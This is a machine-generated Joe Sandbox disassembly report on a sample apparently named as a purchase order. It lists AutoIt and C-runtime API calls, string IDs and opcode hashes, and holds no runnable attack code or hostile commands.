                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp$__getptd_noexit
                                                • String ID: P-}$UNICODE$UTF-16LE$UTF-8$ccs
                                                • API String ID: 78897640-3509635038
                                                • Opcode ID: 80d8e39787b7d54f5f67d479a36c6265007c676952fa82a1ee0f8ba8489905fb
                                                • Instruction ID: 48c3025fa9ec4ac7f799bd75edaccdd1109ca4f1faedc658ab63a835fed44bbf
                                                • Opcode Fuzzy Hash: 80d8e39787b7d54f5f67d479a36c6265007c676952fa82a1ee0f8ba8489905fb
                                                • Instruction Fuzzy Hash: 635158F2E08309D9FFB40E65D945B7966D0AB51364F24403AEF85B71C3E6B5CE80864E

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00013074
                                                • RegisterClassExW.USER32(00000030), ref: 0001309E
                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 000130AF
                                                • LoadIconW.USER32(000000A9), ref: 000130F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 975902462-1005189915
                                                • Opcode ID: 0062c7d9c431c43e0186cc333d68a8f8c5d2fd4035c75bdd515289069fe4ff3c
                                                • Instruction ID: 17c9416896fceddc0b9e7b9429cb39599f3585d2044016e3c6708372e00aafd1
                                                • Opcode Fuzzy Hash: 0062c7d9c431c43e0186cc333d68a8f8c5d2fd4035c75bdd515289069fe4ff3c
                                                • Instruction Fuzzy Hash: 12314CB1941306AFEB40CFA4DC85AEDBBF4FB09311F14412BE980E62A0D7B90585DF91

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00013074
                                                • RegisterClassExW.USER32(00000030), ref: 0001309E
                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 000130AF
                                                • LoadIconW.USER32(000000A9), ref: 000130F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 975902462-1005189915
                                                • Opcode ID: 383c6cd5b2420a1ba7e41d274dc8d5f497f8e3c06f217258c7571cb9f4fda009
                                                • Instruction ID: b2520fed28ceeb6e027ef532d99c4bbda9d0d3ddc315c4abbaa58d08ca27218f
                                                • Opcode Fuzzy Hash: 383c6cd5b2420a1ba7e41d274dc8d5f497f8e3c06f217258c7571cb9f4fda009
                                                • Instruction Fuzzy Hash: 7921C5B1901619AFEB00DFA4EC49BEDBBF8FB09701F10412BF910E62A0D7B945549FA1

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00030313
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0003031B
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00030326
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00030331
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00030339
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00030341
                                                  • Part of subcall function 00026259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 000262B4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0001FB2D
                                                • OleInitialize.OLE32(00000000), ref: 0001FBAA
                                                • CloseHandle.KERNEL32(00000000), ref: 00054921
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                • String ID: <W$\T$%$S
                                                • API String ID: 3094916012-882076323
                                                • Opcode ID: 81254fc62d386fa0b759ff792fe7d9e48c414860662a6d42d5e4963616b747af
                                                • Instruction ID: 93465659034a5f722b32a7a3d527124d8491a1926c93e6ec4d572a61ebbfae90
                                                • Opcode Fuzzy Hash: 81254fc62d386fa0b759ff792fe7d9e48c414860662a6d42d5e4963616b747af
                                                • Instruction Fuzzy Hash: 0181BDB0906F418FE384DF29FD556997BE5FB4830B760812B9C19C72A2EB7845848F72

                                                Control-flow Graph

                                                APIs
                                                • ___createFile.LIBCMT ref: 0004825C
                                                  • Part of subcall function 00047E7D: ___crtIsPackagedApp.LIBCMT ref: 00047E83
                                                  • Part of subcall function 00047E7D: GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 00047E96
                                                  • Part of subcall function 00047E7D: GetProcAddress.KERNEL32(00000000), ref: 00047E9D
                                                • GetLastError.KERNEL32 ref: 00048285
                                                • __dosmaperr.LIBCMT ref: 0004828C
                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 0004829F
                                                • GetLastError.KERNEL32 ref: 000482C2
                                                • __dosmaperr.LIBCMT ref: 000482CB
                                                • CloseHandle.KERNEL32(?), ref: 000482D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorFileHandleLast__dosmaperr$AddressCloseModulePackagedProcType___create___crt
                                                • String ID:
                                                • API String ID: 569456945-0
                                                • Opcode ID: 82dbe3574d4547b1d39d6bbb2bac601426092349e609d657de8e8a41d107f031
                                                • Instruction ID: e5b74e7c627e2766821de8d77573bd7cc2fd7d0e9175b97b57a23fc5b7dde1b0
                                                • Opcode Fuzzy Hash: 82dbe3574d4547b1d39d6bbb2bac601426092349e609d657de8e8a41d107f031
                                                • Instruction Fuzzy Hash: C31121B1A11202AFEB199F74CC18ABD7B64FF01310F14CA68F922D72E2DB798900CB10

                                                Control-flow Graph

                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00013A15
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00013A36
                                                • ShowWindow.USER32(00000000), ref: 00013A4A
                                                • ShowWindow.USER32(00000000), ref: 00013A53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 15022c72a952f6d19c10a8fa0ea54bf5b853e4afb9db25208cd2926aac2c3225
                                                • Instruction ID: 74352f46fedf632a16e21f017fff7c2533581e3fb47ac5e8a5c2bbde16fc9cae
                                                • Opcode Fuzzy Hash: 15022c72a952f6d19c10a8fa0ea54bf5b853e4afb9db25208cd2926aac2c3225
                                                • Instruction Fuzzy Hash: 5BF03A706022907EFA305723AC48E7B2F7DE7CBF52B00002BBD00E2170C2690804DAB0

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 10ea7c398250f42e3abf275e74b38cff49161a40c8c6da5cc05fb6bc3dafebfc
                                                • Instruction ID: 706141bfe0ee2e1f3bf2bec61d491c1168d0537de086352a121317787bf0f70d
                                                • Opcode Fuzzy Hash: 10ea7c398250f42e3abf275e74b38cff49161a40c8c6da5cc05fb6bc3dafebfc
                                                • Instruction Fuzzy Hash: 5C51C370A04F05DBDB268F69DC856AE77FAAF40322F248729F825972E1D7709E508B40

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000135A1,SwapMouseButtons,00000004,?), ref: 000135D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000135A1,SwapMouseButtons,00000004,?,?,?,?,00012754), ref: 000135F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,000135A1,SwapMouseButtons,00000004,?,?,?,?,00012754), ref: 00013617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: d6abaa41e62cc98603d4783198e1e09cf425956c6b695b901331795a11f7830e
                                                • Instruction ID: fd4f7bdd20d2bcacbc9fee09d448ebc059ae9052a8db7f7d5656c692069efb2f
                                                • Opcode Fuzzy Hash: d6abaa41e62cc98603d4783198e1e09cf425956c6b695b901331795a11f7830e
                                                • Instruction Fuzzy Hash: 9F1115B5615218BFEB208F64DC84AFFBBBCEF44740F11856AE805D7210E6719E949BA0

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: AU3!P/$EA06
                                                • API String ID: 4104443479-4224917454
                                                • Opcode ID: 0c7353bed492ce15bcabcc9ff3a8ea80b167e943cfe08ad879ad8cdae1083e00
                                                • Instruction ID: fd8b2585aeeb946faa90fc2da3d62447d0c4b3d9544c4f09225dafb4906b31dd
                                                • Opcode Fuzzy Hash: 0c7353bed492ce15bcabcc9ff3a8ea80b167e943cfe08ad879ad8cdae1083e00
                                                • Instruction Fuzzy Hash: 41418D71A041589BCF329B64CCA1BFE7FE6AB45300F284075FC829B2A3C6218DC587E1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: ec6dd20e648924f361f8044ec6ec1334e60bf9b601263cbfbc3d9b148dd934fb
                                                • Instruction ID: fa94c816353d5d77a5627f7226d1e816e01a770ff4da9607483c3c2c995289a1
                                                • Opcode Fuzzy Hash: ec6dd20e648924f361f8044ec6ec1334e60bf9b601263cbfbc3d9b148dd934fb
                                                • Instruction Fuzzy Hash: 78012D71C042187EDB29C7A8CC16EFE7BFCDB01301F00859EF556D2181E9B4E6088760
                                                APIs
                                                  • Part of subcall function 0003588C: __FF_MSGBANNER.LIBCMT ref: 000358A3
                                                  • Part of subcall function 0003588C: __NMSG_WRITE.LIBCMT ref: 000358AA
                                                  • Part of subcall function 0003588C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001), ref: 000358CF
                                                • std::exception::exception.LIBCMT ref: 00030F6C
                                                • __CxxThrowException@8.LIBCMT ref: 00030F81
                                                  • Part of subcall function 0003871B: RaiseException.KERNEL32(?,?,?,000C9E78,?,?,?,?,?,00030F86,?,000C9E78,?,00000001), ref: 00038770
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID: bad allocation
                                                • API String ID: 3902256705-2104205924
                                                • Opcode ID: c93d67d4f537b514b8a6a21809ef751b161d82f6512c0904c78ae1a3c744f03d
                                                • Instruction ID: 6afcb2e63f3fd1b58f62c9943ddf5baf8454140049efab8ec138917b812a3367
                                                • Opcode Fuzzy Hash: c93d67d4f537b514b8a6a21809ef751b161d82f6512c0904c78ae1a3c744f03d
                                                • Instruction Fuzzy Hash: 1CF0A4315053196ACB22ABD8EC16ADE7BEC9F01311F1044B5F908A6993DF708A9486D1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __flush__write_memmove
                                                • String ID:
                                                • API String ID: 1671952623-0
                                                • Opcode ID: b0638cb3213e93c6f434489765cdd88db8f4f2faa4d4b312fa2b0d90ec4d6742
                                                • Instruction ID: 30c8dd4075b1674f3a55bd48755ed0e1eac5577458c22d31ae25075e509b604b
                                                • Opcode Fuzzy Hash: b0638cb3213e93c6f434489765cdd88db8f4f2faa4d4b312fa2b0d90ec4d6742
                                                • Instruction Fuzzy Hash: 97218634B046069BDF6A8F69C8C06AEBBEEAF40354F24857EE455CA640D670FD418B40
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 000358A3
                                                  • Part of subcall function 0003A2EB: __NMSG_WRITE.LIBCMT ref: 0003A312
                                                  • Part of subcall function 0003A2EB: __NMSG_WRITE.LIBCMT ref: 0003A31C
                                                • __NMSG_WRITE.LIBCMT ref: 000358AA
                                                  • Part of subcall function 0003A348: GetModuleFileNameW.KERNEL32(00000000,000D33BA,00000104,00000000,00000000,?), ref: 0003A3DA
                                                  • Part of subcall function 0003A348: ___crtMessageBoxW.LIBCMT ref: 0003A488
                                                  • Part of subcall function 0003321F: ___crtCorExitProcess.LIBCMT ref: 00033225
                                                  • Part of subcall function 0003321F: ExitProcess.KERNEL32 ref: 0003322E
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • RtlAllocateHeap.NTDLL(01450000,00000000,00000001), ref: 000358CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: d874d682571918b673b97564a070394fa18e191de3bdcda0c08304aeb41a37b5
                                                • Instruction ID: 0c67fce38f88048d05fd703cbc23f1441e5f547c7db225524aaeefb3b02d7dd2
                                                • Opcode Fuzzy Hash: d874d682571918b673b97564a070394fa18e191de3bdcda0c08304aeb41a37b5
                                                • Instruction Fuzzy Hash: 7A019E31251B169AE6272779EC42AAEB39CEF82762F100536F901AB1A2DE749E404771
                                                APIs
                                                • _memset.LIBCMT ref: 0001418D
                                                  • Part of subcall function 0001463E: _wcsncpy.LIBCMT ref: 00014652
                                                • _wcscpy.LIBCMT ref: 000141E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000141F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 890625446-0
                                                • Opcode ID: bfdbd817e7bf76624888850e8fd5a3dcda3b566ae727dd9e1c6756c757413dee
                                                • Instruction ID: f032ab11d8b7a9559726ed9a4f630e7da9a64b95768ea04fc8b90c0e05e3bc1b
                                                • Opcode Fuzzy Hash: bfdbd817e7bf76624888850e8fd5a3dcda3b566ae727dd9e1c6756c757413dee
                                                • Instruction Fuzzy Hash: C301B5711083454FD322DF50D841BDBBBECBF85304F14455EF58986182DB345149CB92
                                                APIs
                                                • _memset.LIBCMT ref: 0001418D
                                                  • Part of subcall function 0001463E: _wcsncpy.LIBCMT ref: 00014652
                                                • _wcscpy.LIBCMT ref: 000141E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000141F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 890625446-0
                                                • Opcode ID: 2e3f11fd8a75bb31bc15495db7048f44603dc30a98e4fbfbd75a0417f3f69c40
                                                • Instruction ID: b7d19ffd4b811ded410ba7dc866371905f444790a7cf2661521286abb18b095f
                                                • Opcode Fuzzy Hash: 2e3f11fd8a75bb31bc15495db7048f44603dc30a98e4fbfbd75a0417f3f69c40
                                                • Instruction Fuzzy Hash: 5D01AD720083049FD221EF94D882BDFB3ECEF88304F10491EF68987142DB3492498B92
                                                APIs
                                                • _free.LIBCMT ref: 00078DC4
                                                  • Part of subcall function 00032ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EE9
                                                  • Part of subcall function 00032ED5: GetLastError.KERNEL32(00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EFB
                                                • _free.LIBCMT ref: 00078DD5
